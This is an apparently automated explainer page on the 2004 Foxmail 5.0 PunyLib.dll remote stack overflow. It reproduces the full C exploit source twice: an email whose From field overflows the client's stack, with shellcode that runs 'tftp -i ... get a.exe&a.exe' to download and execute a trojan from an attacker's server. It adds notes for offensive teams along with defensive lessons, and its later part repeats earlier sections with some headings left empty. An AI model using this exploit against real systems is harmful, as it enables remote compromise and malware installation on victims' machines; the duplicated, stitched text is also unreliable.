By exploitdb papers bot•March 23, 2004•

papers

Foxmail 5.0 PunyLib.dll Remote Stack Overflow Explained

What this paper is

This paper details a remote stack buffer overflow vulnerability in Foxmail version 5.0, specifically within the PunyLib.dll component. The exploit, developed by the XFOCUS Security Team, allows an attacker to execute arbitrary code on a victim's machine by sending a specially crafted email. The exploit leverages a TFTP server to deliver and execute a trojan.

Simple technical breakdown

The vulnerability lies in how Foxmail handles certain email content, likely when processing attachments or specific MIME types. When a malformed email is received and processed, it causes a buffer overflow on the stack. This overflow overwrites critical control flow data, such as the return address. The exploit then redirects execution to shellcode embedded within the email itself. This shellcode is designed to initiate a TFTP connection to a server controlled by the attacker, download a malicious executable (a.exe), and then run it.

Complete code and payload walkthrough

The provided C code implements the exploit. Let's break it down section by section.

`fmx.c` - Header and Includes

/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
* -----------------------------------------------------------------------
* Author   : xfocus <webmaster@xfocus.org>
*          : http://www.xfocus.org
* Maintain : XFOCUS Security Team <security@xfocus.org>
* Version  : 0.2
*
* Test     : Windows 2000 server GB/XP professional
*                + Foxmail 5.0.300.0
* Notes    : unpublished vul.
* Greets   : all member of XFOCUS Security Team.
* Complie  : cl fmx.c
* Usage    : fmx <mail_addr> <tftp_server> <smtp_server>
*             mail_addr: email address we wantto hack
*             tftp_server: run a tftp server and have a a.exe trojan
*             smtp_server: SMTP server don't need login, we send the email thru it
*
* Date     : 2004-02-27
* Revised  : 2004-03-05
*
* Revise History:
* 2003-03-05  call WinExec() addr of Foxmail.exe module to run tftp for down&execute
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

Comments: Provide crucial context: the target software (Foxmail 5.0), the vulnerability type (remote stack buffer overflow), author, publication date, testing environment, compilation instructions (cl fmx.c), and usage syntax.
#include <stdio.h>, #include <stdlib.h>, #include <windows.h>: Standard C libraries for input/output, general utilities, and Windows API functions, respectively.
#pragma comment (lib,"ws2_32"): This directive tells the Microsoft Visual C++ compiler to link against the Windows Sockets library (ws2_32.lib), which is necessary for network operations.

`packet` - Email Body Structure

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %s\r\n" //buffer to overrun
"Subject: Hi,man\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: multipart/mixed; boundary=\"87122827\"\r\n"
"\r\n"
"\r\n"
"--87122827\r\n"
"Content-Type: text/plain; charset=us-ascii\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"T\r\n"
"\r\n"
"--87122827\r\n"
"Content-Disposition: attachment\r\n"
"Content-Type: Text/HTML;\r\n"
"  name=\"girl.htm\"\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"<html></html>\r\n"
"--87122827--\r\n"
"\r\n"
".\r\n";

This packet variable defines the structure of the email that will be sent.
"From: %s\r\n": This is the critical part. The %s is a format string placeholder that will be replaced by the attacker-controlled buffer containing the overflow data. This is where the vulnerability is triggered.
The rest of the packet defines a multipart MIME email. This structure is used to embed different types of content, including an attachment (girl.htm). The multipart/mixed type is often used to send various parts of an email, and the Content-Disposition: attachment header indicates that one part should be treated as an attachment.

`winexec` and `winexec2` - Shellcode

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

These are small pieces of machine code (shellcode).

Purpose: The comments indicate these shellcodes are designed to call the WinExec() function. WinExec() is a Windows API function that executes a specified command.
Difference: winexec is for Foxmail 5.0.300, and winexec2 is for Foxmail 5.0.210 BETA2. This suggests that the exact address of WinExec() within the Foxmail.exe module differs between these versions, and the shellcode needs to be tailored to find that address.
Content: The byte sequences are raw machine instructions. Without a disassembler, it's hard to know the exact sequence of operations, but the goal is to locate and call WinExec. The exploit likely uses a technique to find the address of WinExec within the loaded Foxmail.exe module in memory. The structure \x83\xec\x50 often relates to stack frame setup. \xeb\x0c is a short jump. The subsequent bytes are likely instructions to find the WinExec address and then call it.

`Make_Connection` Function

int  Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf); // Set socket to non-blocking mode
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target)); // Initiate connection
    if((i=select(s+1,0,&wd,0,&tv))==(-1)) // Wait for connection or timeout
    {
        closesocket(s);
        return -3;
    }
    if(i==0) // Timeout
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); // Check for connection errors
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf); // Restore blocking mode (or keep non-blocking if bf is 1)
    return s;
}

Purpose: This function establishes a TCP connection to a specified IP address and port with a given timeout. It's used to connect to the SMTP server.
socket(AF_INET, SOCK_STREAM, 0): Creates a TCP socket.
inet_addr(address): Converts an IP address string to a network byte order integer.
htons(port): Converts a port number to network byte order.
ioctlsocket(s, FIONBIO, &bf): Sets the socket to non-blocking mode. This allows the connect call to return immediately if the connection isn't established, and select is used to wait for the connection to complete.
connect(): Attempts to establish the connection.
select(): A system call that monitors multiple file descriptors (sockets in this case) for readiness. Here, it's used to wait for the connect operation to complete or to time out.
getsockopt(): Used to retrieve the error status of the socket after connect and select.
Return Value: Returns the socket descriptor on success, or negative error codes indicating different failure reasons.

`SendXMail` Function

//send magic mail
int  SendXMail(    char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
    SOCKET  csock;
    int     ret,i=0;
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
    csock = Make_Connection(smtpserver, SMTPPORT, 10); // Connect to SMTP server
    if(csock<0)
    {
        printf("connect err.\n");
        exit(1);
    }

    // --- SMTP Handshake ---
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive banner
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf); // Print server response

    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0); // Send HELO command
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive HELO response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);

    ret=send(csock, "MAIL FROM: info@sina.com\r\n",strlen("MAIL FROM: info@sina.com\r\n"), 0); // Send MAIL FROM
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive MAIL FROM response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);
    
    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr); // Construct RCPT TO command
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive RCPT TO response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);
    Sleep(1000); // Small delay
    
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0); // Send DATA command
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive DATA response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);

    // --- Exploit Payload Construction ---
    printf("send exploit mail...\n");
    memset(sbuf, 0, sizeof(sbuf)); // Clear main buffer for email body
    memset(buf, 0, sizeof(buf));   // Clear temporary buffer
    memset(buf, 0x41, sizeof(buf)-1); // Fill buffer with 'A's (for overflow)
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec); // This line is commented out, using shellcode parameter instead
    strcpy(tmp, shellcode); // Copy the provided shellcode
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:"); // Append command to download and run a.exe via TFTP
    sprintf(tmp1, tmp, tftp); // Format the command with the TFTP server IP
    
    // This is the core of the overflow. The 'buf' is filled with 'A's, and the crafted command is placed at an offset.
    // The offset 0x100 is chosen to land within the vulnerable buffer in PunyLib.dll.
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1)); // Place the command string at a specific offset within the 'buf'
    
    // Overwriting return address and other stack data
    *(int *)(buf+0x100)=0x7ffa54cd;  // Overwrite return address with a pointer to ESP (likely to point to shellcode)
    *(int *)(buf+0x104)=0x80eb80eb;  // Junk/NOP sled or jump instructions
    *(int *)(buf+0x108)=0x7ffdf220;  // Another address, possibly a writable memory location
    *(int *)(buf+0x110)=0x7ffdf220;  // Another address, possibly a writable memory location
    
    memcpy(buf, "girl\x0d", 5); // Prepend some data to the buffer, possibly to align or trigger specific parsing
    sprintf(sbuf, (char *)packet, buf); // Format the email body with the crafted buffer

    ret=send(csock, sbuf,strlen(sbuf), 0); // Send the crafted email
    if(ret<=0) { printf("send err.\n"); exit(1); }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0); // Receive final server response
    if(ret<=0) { printf("recv err.\n"); exit(1); }
    printf(buf);
    printf("exploit mail sent.\n");
    closesocket(csock); // Close the connection
    return 0;
}

Purpose: This function orchestrates the sending of the malicious email via SMTP.
SMTP Handshake: It first establishes a connection to the SMTP server using Make_Connection. Then, it performs a standard SMTP handshake:
- Receives the server's greeting banner.
- Sends HELO server\r\n.
- Receives the server's response.
- Sends MAIL FROM: info@sina.com\r\n.
- Receives the response.
- Constructs and sends RCPT TO: <victim_email>\r\n.
- Receives the response.
- Sends DATA\r\n to indicate the start of the email body.
- Receives the response.
Exploit Payload Construction:
- memset(buf, 0x41, sizeof(buf)-1);: This line is crucial. It fills a buffer (buf) with the character 'A' (hex 0x41). This buffer is intended to be the data that overflows.
- strcpy(tmp, shellcode);: The provided shellcode (either winexec or winexec2) is copied into a temporary buffer tmp.
- strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");: The shellcode is appended with a command string. This command tells the victim's machine to:
  - cmd /c: Execute the following command and then terminate.
  - tftp -i %s get a.exe: Use TFTP in binary mode (-i) to download a file named a.exe from the specified TFTP server (%s will be replaced by the tftp argument).
  - &a.exe:: After downloading, execute the a.exe file. The colon at the end might be a typo or intended for a specific execution context.
- sprintf(tmp1, tmp, tftp);: The tftp server IP address is inserted into the command string.
- memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));: This places the crafted command string into the buf buffer. The offset 0x100 - strlen(tmp1) is calculated to position the command string such that it will be part of the data that overwrites the stack. The 0x100 offset is significant as it's likely the point where the overflow begins to overwrite the return address.
- *(int *)(buf+0x100)=0x7ffa54cd;: This line overwrites what is expected to be the return address on the stack. 0x7ffa54cd is a memory address. In this context, it's likely an address pointing to the shellcode or a location that will lead to its execution. The value 0x7ffa54cd is specific to the target environment and might be an address of WinExec or a JMP ESP instruction within Foxmail.exe or a loaded DLL.
- *(int *)(buf+0x104)=0x80eb80eb;: These are likely padding or jump instructions. 0xeb80 is a short jump instruction.
- *(int *)(buf+0x108)=0x7ffdf220; and *(int *)(buf+0x110)=0x7ffdf220;: These are other overwritten stack locations, possibly pointing to writable memory or used for further control flow manipulation.
- memcpy(buf, "girl\x0d", 5);: This prepends "girl\r" to the buffer. This might be to trigger specific parsing logic in Foxmail or to pad the buffer.
- sprintf(sbuf, (char *)packet, buf);: The entire crafted buffer (buf) is inserted into the From: field of the email template (packet).
- send(csock, sbuf,strlen(sbuf), 0);: The complete, malicious email is sent.
- The function then receives the final SMTP response and closes the connection.

`main` Function

int main(int argc, char * argv[])
{
    WSADATA WSAData;
    char *mailaddr = NULL;
    char *tftp = NULL;
    char *smtpserver = NULL;

    if(argc!=4)
    {
        printf("Usage: %s <mail_addr> <tftp_server> <smtp_server>\ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1\n", argv[0], argv[0]);
        return 1;
    }
    mailaddr=argv[1];
    tftp=argv[2];
    smtpserver=argv[3];

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    
    //WinExec() address
    SendXMail(mailaddr, tftp, smtpserver, winexec);  //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    SendXMail(mailaddr, tftp, smtpserver, winexec2);  //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

    WSACleanup();

    return 0;
}

Purpose: This is the entry point of the program. It parses command-line arguments, initializes the Windows Sockets library, calls SendXMail twice (once for each shellcode version), and then cleans up.
Argument Parsing: It checks if exactly three arguments are provided: the target email address, the TFTP server IP, and the SMTP server IP.
WSAStartup(MAKEWORD(1,1), &WSAData): Initializes the Windows Sockets API. This must be called before any other socket functions.
SendXMail(mailaddr, tftp, smtpserver, winexec);: Calls SendXMail with the first shellcode (winexec). This attempts to exploit Foxmail 5.0.300.
SendXMail(mailaddr, tftp, smtpserver, winexec2);: Calls SendXMail again with the second shellcode (winexec2). This attempts to exploit Foxmail 5.0.210 BETA2. The exploit tries both in case the user has either version.
WSACleanup(): Cleans up the Windows Sockets API resources.

Code Fragment/Block -> Practical Purpose Mapping

#include <windows.h>: Access to Windows API functions like socket, connect, send, recv, WSADATA, WSAStartup, WSACleanup, ioctlsocket, select, Sleep.
#pragma comment (lib,"ws2_32"): Links the network library.
unsigned char packet[]: Defines the email template, including the vulnerable From: field.
unsigned char winexec[], unsigned char winexec2[]: The machine code payload that will be executed on the victim.
main(): Entry point, argument parsing, socket initialization/cleanup, orchestrates exploit calls.
Make_Connection(): Establishes a TCP connection to the SMTP server.
SendXMail():
- SMTP handshake logic: HELO, MAIL FROM, RCPT TO, DATA.
- Buffer preparation (memset(buf, 0x41, ...)): Creates the overflow data.
- Shellcode and command injection (strcpy(tmp, shellcode), strcat(tmp, "cmd /c tftp...")): Combines the shellcode with the TFTP download command.
- Payload placement (memcpy(buf+0x100-strlen(tmp1), tmp1, ...)): Inserts the crafted command into the overflow buffer at a specific offset.
- Return address overwrite (*(int *)(buf+0x100)=0x7ffa54cd;): Redirects execution flow.
- Email formatting (sprintf(sbuf, (char *)packet, buf);): Integrates the overflow buffer into the email.
- Sending the email (send(csock, sbuf, ...)): Transmits the malicious email.

Practical details for offensive operations teams

Required Access Level: Network access to the target's SMTP server (if the target is configured to relay mail through an external server) or direct network access to the target's machine if the exploit were to be delivered via a local file or other means (though this exploit is remote). The primary vector is sending an email.
Lab Preconditions:
- A vulnerable Foxmail 5.0 client installed on a test machine.
- A functional SMTP server that allows relaying from the attacker's IP or an internal network.
- A TFTP server set up by the attacker, hosting a malicious executable named a.exe. This a.exe would typically be a trojan or backdoor.
- The attacker needs to know the target's email address and the IP address of the SMTP server.
Tooling Assumptions:
- A C compiler (like Microsoft Visual C++ cl.exe) to compile the exploit code.
- A TFTP server implementation (e.g., Tftpd32, or a Linux tftpd-hpa).
- A malicious executable (a.exe) prepared beforehand.
Execution Pitfalls:
- SMTP Server Restrictions: Many SMTP servers have anti-spam measures, including IP blacklisting, sender verification, and content filtering, which could prevent the email from being delivered or processed.
- Foxmail Version Mismatch: The exploit is specific to Foxmail 5.0.300.0 and 5.0.210 BETA2. Different versions or patches would likely render the exploit ineffective. The hardcoded addresses in the shellcode are highly version-dependent.
- Address Space Layout Randomization (ASLR) / Data Execution Prevention (DEP): While ASLR and DEP were less prevalent or robust in 2004, modern systems would likely have protections that could prevent the shellcode from executing or the exploit from succeeding. The hardcoded return address 0x7ffa54cd is a prime target for these defenses.
- Network Latency/Reliability: Unreliable network connections could cause the SMTP transaction to fail.
- TFTP Server Availability: The TFTP server must be accessible from the victim's machine. Firewalls could block TFTP traffic (UDP port 69).
- a.exe Execution: The victim's operating system or antivirus software might prevent a.exe from running.
Telemetry:
- SMTP Server Logs: Outgoing email traffic from the attacker's IP to the target SMTP server. Successful delivery of the email.
- TFTP Server Logs: Incoming TFTP connection requests from the victim's IP, and successful download of a.exe.
- Victim Machine:
  - Network traffic to the attacker's TFTP server.
  - Execution of a.exe (if not blocked by AV).
  - Potential process creation events for cmd.exe and tftp.exe.
  - Antivirus alerts if a.exe is detected.
  - Unusual network activity originating from the victim machine if a.exe is a backdoor.
- Exploit Tool Output: The C program will print SMTP server responses and status messages.

Where this was used and when

Context: This exploit was developed and published in 2004. At that time, Foxmail was a popular email client, particularly in Asia.
Usage: The exploit was designed for remote code execution against Foxmail users. The authors explicitly mention it was used to "hack" email addresses. The use of TFTP suggests a common method for delivering trojans in that era. It's likely this exploit was used in targeted attacks or as part of broader email-based malware campaigns.

Defensive lessons for modern teams

Patch Management: The most critical lesson is the importance of keeping software, especially email clients and their associated libraries, up-to-date. This vulnerability was patched long ago.
Email Security Gateways: Modern email security solutions can detect and block malicious attachments, suspicious MIME structures, and exploit attempts embedded in email content.
Network Segmentation and Firewalls: Restricting outbound TFTP traffic (UDP 69) from client machines can prevent the download of malicious payloads.
Endpoint Detection and Response (EDR): EDR solutions can detect the execution of a.exe or the cmd.exe process spawned by the exploit, even if the initial email delivery is successful.
Application Whitelisting: Preventing unauthorized executables like a.exe from running on endpoints.
Understanding Protocol Usage: TFTP is an insecure protocol and should be restricted or disabled on client networks unless absolutely necessary.
Secure Coding Practices: Developers must be aware of buffer overflow vulnerabilities and implement robust input validation and bounds checking.

ASCII visual (if applicable)

This exploit involves a client-server interaction and a specific vulnerability within the client. A simplified flow can be visualized:

+-----------------+       +-----------------+       +-----------------+
| Attacker's      | ----> | SMTP Server     | ----> | Victim's        |
| Machine         |       | (Relay/Internal)|       | Foxmail Client  |
| (Runs Exploit)  |       +-----------------+       +-----------------+
+-----------------+                                         |
        |                                                   | (Vulnerable
        | Sends Malicious Email                             |  PunyLib.dll)
        |                                                   v
        |                                         +-----------------+
        |                                         | Stack Overflow  |
        |                                         +-----------------+
        |                                                   |
        |                                                   | Redirects to
        |                                                   | Shellcode
        |                                                   v
        |                                         +-----------------+
        |                                         | Shellcode       |
        |                                         | (Executes TFTP |
        |                                         |  command)       |
        |                                         +-----------------+
        |                                                   |
        |                                                   | Connects to
        |                                                   | Attacker's
        |                                                   | TFTP Server
        |                                                   v
        |                                         +-----------------+
        |                                         | Attacker's      |
        | <---------------------------------------| TFTP Server     |
        |   (Sends a.exe)                         | (Hosts a.exe)   |
        |                                         +-----------------+
        |                                                   |
        |                                                   | Victim executes a.exe
        |                                                   v
        |                                         +-----------------+
        |                                         | Malicious       |
        |                                         | Executable      |
        |                                         | (a.exe)         |
        |                                         +-----------------+

Source references

Paper: Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow
Author: xfocus
Published: 2004-03-23
Exploit-DB URL: https://www.exploit-db.com/papers/164
Raw Exploit URL: https://www.exploit-db.com/raw/164

Original Exploit-DB Content (Verbatim)

/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
* -----------------------------------------------------------------------
* Author   : xfocus <webmaster@xfocus.org>
*          : http://www.xfocus.org
* Maintain : XFOCUS Security Team <security@xfocus.org>
* Version  : 0.2
*
* Test     : Windows 2000 server GB/XP professional
*                + Foxmail 5.0.300.0
* Notes    : unpublished vul.
* Greets   : all member of XFOCUS Security Team.
* Complie  : cl fmx.c
* Usage    : fmx <mail_addr> <tftp_server> <smtp_server>
*             mail_addr: email address we wantto hack
*             tftp_server: run a tftp server and have a a.exe trojan
*             smtp_server: SMTP server don't need login, we send the email thru it
*
* Date     : 2004-02-27
* Revised  : 2004-03-05
*
* Revise History:
* 2003-03-05  call WinExec() addr of Foxmail.exe module to run tftp for down&execute
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %s\r\n" //buffer to overrun
"Subject: Hi,man\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: multipart/mixed; boundary=\"87122827\"\r\n"
"\r\n"
"\r\n"
"--87122827\r\n"
"Content-Type: text/plain; charset=us-ascii\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"T\r\n"
"\r\n"
"--87122827\r\n"
"Content-Disposition: attachment\r\n"
"Content-Type: Text/HTML;\r\n"
"  name=\"girl.htm\"\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"<html></html>\r\n"
"--87122827--\r\n"
"\r\n"
".\r\n";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)
unsigned char winexec[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)
unsigned char winexec2[] =
"\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff";

#define SMTPPORT 25
int  Make_Connection(char *address,int port,int timeout);
int  SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])
{
    WSADATA WSAData;
    char *mailaddr = NULL;
    char *tftp = NULL;
    char *smtpserver = NULL;

    if(argc!=4)
    {
        printf("Usage: %s <mail_addr> <tftp_server> <smtp_server>\ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1\n", argv[0], argv[0]);
        return 1;
    }
    mailaddr=argv[1];
    tftp=argv[2];
    smtpserver=argv[3];

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    
    //WinExec() address
    SendXMail(mailaddr, tftp, smtpserver, winexec);  //WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    SendXMail(mailaddr, tftp, smtpserver, winexec2);  //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

    WSACleanup();

    return 0;
}

//  ½¨Á¢TCPÁ¬½Ó
//  ÊäÈë:
//       char * address  IPµØÖ·
//       int  port       ¶Ë¿Ú
//       int  timeout    ÑÓÊ±
//  Êä³ö:
//  ·µ»Ø:
//       ³É¹¦ >0
//       ´íÎó <=0    

int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}

//send magic mail
int  SendXMail(    char *mailaddr, char *tftp, char *smtpserver, char *shellcode)
{
    SOCKET  csock;
    int     ret,i=0;
    char buf[510], sbuf[0x10000], tmp[500], tmp1[500];
    csock = Make_Connection(smtpserver, SMTPPORT, 10);
    if(csock<0)
    {
        printf("connect err.\n");
        exit(1);
    }

    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    ret=send(csock, "HELO server\r\n",strlen("HELO server\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    ret=send(csock, "MAIL FROM: info@sina.com\r\n",strlen("MAIL FROM: info@sina.com\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    
    sprintf(tmp, "RCPT TO: %s\r\n", mailaddr);
    ret=send(csock, tmp,strlen(tmp), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    Sleep(1000);
    
    ret=send(csock, "DATA\r\n",strlen("DATA\r\n"), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);

    printf("send exploit mail...\n");
    memset(sbuf, 0, sizeof(sbuf));
    memset(buf, 0, sizeof(buf));
    memset(buf, 0x41, sizeof(buf)-1);
    memset(tmp, 0, sizeof(tmp));
    //strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)
    strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module
    strcat(tmp, "cmd /c tftp -i %s get a.exe&a.exe:");
    sprintf(tmp1, tmp, tftp);
    memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));
    *(int *)(buf+0x100)=0x7ffa54cd;  //ret addr jmp esp
    *(int *)(buf+0x104)=0x80eb80eb;  //jmp back
    *(int *)(buf+0x108)=0x7ffdf220;  //writeable addr
    *(int *)(buf+0x110)=0x7ffdf220;  //writeable addr
    memcpy(buf, "girl\x0d", 5);
    sprintf(sbuf, (char *)packet, buf);

    ret=send(csock, sbuf,strlen(sbuf), 0);
    if(ret<=0)
    {
        printf("send err.\n");
        exit(1);
    }
    memset(buf, 0, sizeof(buf));
    ret=recv(csock, buf, 4096, 0);
    if(ret<=0)
    {
        printf("recv err.\n");
        exit(1);
    }
    printf(buf);
    printf("exploit mail sent.\n");
    closesocket(csock);
    return 0;
}

// milw0rm.com [2004-03-23]

By exploitdb papers bot•March 23, 2004•

papers

Foxmail 5.0 PunyLib.dll Remote Stack Overflow Explained

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

The provided C code implements the exploit. Let's break it down section by section.

`fmx.c` - Header and Includes

/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit
*
* (C) COPYRIGHT XFOCUS Security Team, 2004
* All Rights Reserved
* -----------------------------------------------------------------------
* Author   : xfocus <webmaster@xfocus.org>
*          : http://www.xfocus.org
* Maintain : XFOCUS Security Team <security@xfocus.org>
* Version  : 0.2
*
* Test     : Windows 2000 server GB/XP professional
*                + Foxmail 5.0.300.0
* Notes    : unpublished vul.
* Greets   : all member of XFOCUS Security Team.
* Complie  : cl fmx.c
* Usage    : fmx <mail_addr> <tftp_server> <smtp_server>
*             mail_addr: email address we wantto hack
*             tftp_server: run a tftp server and have a a.exe trojan
*             smtp_server: SMTP server don't need login, we send the email thru it
*
* Date     : 2004-02-27
* Revised  : 2004-03-05
*
* Revise History:
* 2003-03-05  call WinExec() addr of Foxmail.exe module to run tftp for down&execute
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#pragma comment (lib,"ws2_32")

Comments: Provide crucial context: the target software (Foxmail 5.0), the vulnerability type (remote stack buffer overflow), author, publication date, testing environment, compilation instructions (cl fmx.c), and usage syntax.
#include <stdio.h>, #include <stdlib.h>, #include <windows.h>: Standard C libraries for input/output, general utilities, and Windows API functions, respectively.
#pragma comment (lib,"ws2_32"): This directive tells the Microsoft Visual C++ compiler to link against the Windows Sockets library (ws2_32.lib), which is necessary for network operations.

`packet` - Email Body Structure

//mail body, it's based on a real spam email, heh
unsigned char packet[] =
"From: %s\r\n" //buffer to overrun
"Subject: Hi,man\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: multipart/mixed; boundary=\"87122827\"\r\n"
"\r\n"
"\r\n"
"--87122827\r\n"
"Content-Type: text/plain; charset=us-ascii\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"T\r\n"
"\r\n"
"--87122827\r\n"
"Content-Disposition: attachment\r\n"
"Content-Type: Text/HTML;\r\n"
"  name=\"girl.htm\"\r\n"
"Content-Transfer-Encoding: 7bit\r\n"
"\r\n"
"<html></html>\r\n"
"--87122827--\r\n"
"\r\n"
".\r\n";

This packet variable defines the structure of the email that will be sent.
